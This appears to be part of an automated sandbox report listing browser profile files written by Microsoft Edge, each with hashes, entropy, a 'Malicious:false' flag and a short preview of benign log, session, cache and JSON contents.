                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):7225
                                                                                                                                                                                                                                                Entropy (8bit):3.3551770310966345
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:CvjKYnsR6r899Xp+VKiD5SLl9iSrW5Zvp8dU:Cvj9G9Xp+we5SLl9iSrOZvC6
                                                                                                                                                                                                                                                MD5:BFEC807B1D3066718845230B07AA7A6C
                                                                                                                                                                                                                                                SHA1:20549FA14823D77465F1E8DAF2FEF510A21CCD40
                                                                                                                                                                                                                                                SHA-256:097E4F9B5DAEB97E64B1FBBA7E4B21FC806701BB7A8712299192C48BEC10A1B2
                                                                                                                                                                                                                                                SHA-512:43C4F94D6B7B88106CE415253E401B1AD6E4F7FDF3062007B9B84D947E47538DDC0E45E6530A0BDE738285A522F815B11E58078CBB92DB8B3692808AA83F28ED
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f...............G.`"b................next-map-id.1.Cnamespace-8c8f4e83_e882_4d8b_a34f_6f86abb2a21d-https://ntp.msn.com/.0V.e................V.e................V.e................l.I..................map-0-shd_sweeper.5{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.h.p.-.h.a.s.p.o.l.l.,.p.r.g.-.s.e.a.r.c.h.n.e.w.t.,.p.r.g.-.p.o.l.i.s.h.e.d.-.s.t.y.l.e.s.,.p.r.e.p.r.g.-.1.s.w.-.s.a.q.-.c.i.p.t.1.,.p.r.e.p.r.g.-.1.s.w.-.s.a.e.e.g.t.a.t.2.,.p.r.g.-.1.s.w.-.s.a.-.d.n.n.-.r.m.-.c.a.l.i.b._.t.2.,.p.r.g.-.1.s.w.-.a.b.r.t.p.g.-.r.,.p.r.g.-.1.s.w.-.r.e.v._.a.b.r.t.p.g.,.p.r.g.-.1.s.w.-.t.m.u.i.d.s.y.n.c.r.f.w.o.e.r.r.,.p.r.g.-.1.s.w.-.r.e.f.r.e.s.h.p.,.p.r.g.-.1.s.w.-.t.m.u.i.d.1.s.s.y.n.c.,.p.r.g.-.c.g.-.c.r.o.s.a.l.o.c.1.,.p.r.g

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):330
                                                                                                                                                                                                                                                Entropy (8bit):5.188468338418956
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/rKi+q2PcNwi23oH+TcwtrQMxIFUt8O/i8WZmw+O/2VkwOcNwi23oH+TcwtrQMT:7/x+vLZYebCFUt8O/s/+O/2V54ZYebtJ
                                                                                                                                                                                                                                                MD5:909B9C981BF8086364FC77FB02589820
                                                                                                                                                                                                                                                SHA1:E57D3D8A45210CB66078DDDFF80399FA851A8D29
                                                                                                                                                                                                                                                SHA-256:101243E7C4B38B97A1CA03FAA66165EC5EA8EC9F70E5789EFE6C07747406D9F9
                                                                                                                                                                                                                                                SHA-512:0CF9B64CB1A5EC76FC43B27EC7F4958CA0159C92FF08022B0EC8A42FF5EE9593C7E7F55933D9B660A4F86F95DF15591E2486B44836DA67E65D186BA34BAD7C74
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:27.399 1b0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/16-11:07:27.536 1b0c Recovering log #3.2024/12/16-11:07:27.541 1b0c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):330
                                                                                                                                                                                                                                                Entropy (8bit):5.188468338418956
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/rKi+q2PcNwi23oH+TcwtrQMxIFUt8O/i8WZmw+O/2VkwOcNwi23oH+TcwtrQMT:7/x+vLZYebCFUt8O/s/+O/2V54ZYebtJ
                                                                                                                                                                                                                                                MD5:909B9C981BF8086364FC77FB02589820
                                                                                                                                                                                                                                                SHA1:E57D3D8A45210CB66078DDDFF80399FA851A8D29
                                                                                                                                                                                                                                                SHA-256:101243E7C4B38B97A1CA03FAA66165EC5EA8EC9F70E5789EFE6C07747406D9F9
                                                                                                                                                                                                                                                SHA-512:0CF9B64CB1A5EC76FC43B27EC7F4958CA0159C92FF08022B0EC8A42FF5EE9593C7E7F55933D9B660A4F86F95DF15591E2486B44836DA67E65D186BA34BAD7C74
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:27.399 1b0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/16-11:07:27.536 1b0c Recovering log #3.2024/12/16-11:07:27.541 1b0c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13378838849213694

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1443
                                                                                                                                                                                                                                                Entropy (8bit):3.8034215834102265
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:3/N6dO8HuWjCpsAF4unxDKtLp3X2amEtG1ChqsA6WX+QKkOAM4Y:3/YOECzFgLp2FEkCh/VYHOpJ
                                                                                                                                                                                                                                                MD5:89BB391DBE4147929DFDA3A1803248FA
                                                                                                                                                                                                                                                SHA1:8FF000F8BAAA422CE34E9DA15BFD3C309F5F058A
                                                                                                                                                                                                                                                SHA-256:1722881C50AD11EA23254CA5663D2E089CE605017E82F81908F4F07DDB4F1342
                                                                                                                                                                                                                                                SHA-512:FF938B7B416301F9631EC1C8994FBAA5E34427EA425F998EC6361DEE8E66808A4A79747A9AEF23E2B6012CB3F1DE8535E0976DBBE349E6EE2A01FD10C5D0E395
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:SNSS.......`.:"...........`.:"......"`.:"...........`.:".......`.:".......a.:".......a.:"....!..a.:"...............................`.:"a.:"1..,...a.:"$...8c8f4e83_e882_4d8b_a34f_6f86abb2a21d...`.:".......a.:"....C.........`.:"...`.:".......................`.:"....................5..0...`.:"&...{4B3AC14B-43E5-4896-86E8-9E7D502CE1B5}.....`.:".......`.:"..........................a.:"...........a.:"........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x........r.`e)...r.`e).................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):358
                                                                                                                                                                                                                                                Entropy (8bit):5.183387651069395
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/KAOq2PcNwi23oH+Tcwt7Uh2ghZIFUt8O/HSrZmw+O/HShkwOcNwi23oH+Tcwts:7/KAOvLZYebIhHh2FUt8O/HG/+O/H65h
                                                                                                                                                                                                                                                MD5:AAB0FE40A2B97AFAB6F070476872B194
                                                                                                                                                                                                                                                SHA1:94C745C62327F96D9A86A7037EF0A30343F85BA3
                                                                                                                                                                                                                                                SHA-256:C91F689D24D888C733ABE81EC6C76DAF450C2571F8A437CD6367015A1DC0BBC7
                                                                                                                                                                                                                                                SHA-512:15805C3A20CAC7132C3BBF6EA3944FD2B891B714F61BE654D6EDAF1DD5FF9296BC78091799CD28CAD5037AF0939F6669A6E1BA2BFC8BDDE5AB8461A92C8D3A5B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:26.766 1804 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/16-11:07:26.785 1804 Recovering log #3.2024/12/16-11:07:26.785 1804 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):358
                                                                                                                                                                                                                                                Entropy (8bit):5.183387651069395
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/KAOq2PcNwi23oH+Tcwt7Uh2ghZIFUt8O/HSrZmw+O/HShkwOcNwi23oH+Tcwts:7/KAOvLZYebIhHh2FUt8O/HG/+O/H65h
                                                                                                                                                                                                                                                MD5:AAB0FE40A2B97AFAB6F070476872B194
                                                                                                                                                                                                                                                SHA1:94C745C62327F96D9A86A7037EF0A30343F85BA3
                                                                                                                                                                                                                                                SHA-256:C91F689D24D888C733ABE81EC6C76DAF450C2571F8A437CD6367015A1DC0BBC7
                                                                                                                                                                                                                                                SHA-512:15805C3A20CAC7132C3BBF6EA3944FD2B891B714F61BE654D6EDAF1DD5FF9296BC78091799CD28CAD5037AF0939F6669A6E1BA2BFC8BDDE5AB8461A92C8D3A5B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:26.766 1804 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/16-11:07:26.785 1804 Recovering log #3.2024/12/16-11:07:26.785 1804 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_1

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                                                Entropy (8bit):0.0018090556708630736
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zEZlXollt:/M/xT02zh1
                                                                                                                                                                                                                                                MD5:C45E5E6750C4307FD4054EFEC17F4983
                                                                                                                                                                                                                                                SHA1:C2F42E415C03F9BA579BE171F699823F40730C47
                                                                                                                                                                                                                                                SHA-256:FCB7F96C2FABF7A5E52B06B6A4D2D1744E7B7B4A855979EE1B7916FF028C9CA9
                                                                                                                                                                                                                                                SHA-512:460FDA09B3328B0E64DE9303980943B743C88634D99F61EB2F158F6EC6C17D71849AA284673272B0C22804859BC88748B928F24D8F909CB399F8B9427EB06CBD
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                                                Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                                                Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):440
                                                                                                                                                                                                                                                Entropy (8bit):5.265746393846853
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:7/DOyvLZYebvqBQFUt8O/EZ/+O/TR54ZYebvqBvJ:7/DOYlYebvZg8O/EN/TDoYebvk
                                                                                                                                                                                                                                                MD5:BFF7FA958EFE638022D7134D6EA3C100
                                                                                                                                                                                                                                                SHA1:1ED8B247B16E5B5DC99DFBD4CDDF997FA6520752
                                                                                                                                                                                                                                                SHA-256:E26118E633357FF440FE376C10F495C82C96FFBF9D9D4C0981CF330B72333FE2
                                                                                                                                                                                                                                                SHA-512:2DEF59E637A687DD142B597358D1422EF82BEE199F515E71287830525C960E98EF25A6400DD4F3C83152616DC4C618581618A175744DE9A36074411B62EDE92B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:27.560 1534 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/16-11:07:27.566 1534 Recovering log #3.2024/12/16-11:07:27.585 1534 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):440
                                                                                                                                                                                                                                                Entropy (8bit):5.265746393846853
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:7/DOyvLZYebvqBQFUt8O/EZ/+O/TR54ZYebvqBvJ:7/DOYlYebvZg8O/EN/TDoYebvk
                                                                                                                                                                                                                                                MD5:BFF7FA958EFE638022D7134D6EA3C100
                                                                                                                                                                                                                                                SHA1:1ED8B247B16E5B5DC99DFBD4CDDF997FA6520752
                                                                                                                                                                                                                                                SHA-256:E26118E633357FF440FE376C10F495C82C96FFBF9D9D4C0981CF330B72333FE2
                                                                                                                                                                                                                                                SHA-512:2DEF59E637A687DD142B597358D1422EF82BEE199F515E71287830525C960E98EF25A6400DD4F3C83152616DC4C618581618A175744DE9A36074411B62EDE92B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:27.560 1534 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/16-11:07:27.566 1534 Recovering log #3.2024/12/16-11:07:27.585 1534 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\06f6637e-0ab3-4000-bf6e-b163e34d14fe.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\48b8034b-bd50-4621-9930-bac45b4eb070.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):111
                                                                                                                                                                                                                                                Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF2a185.TMP (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
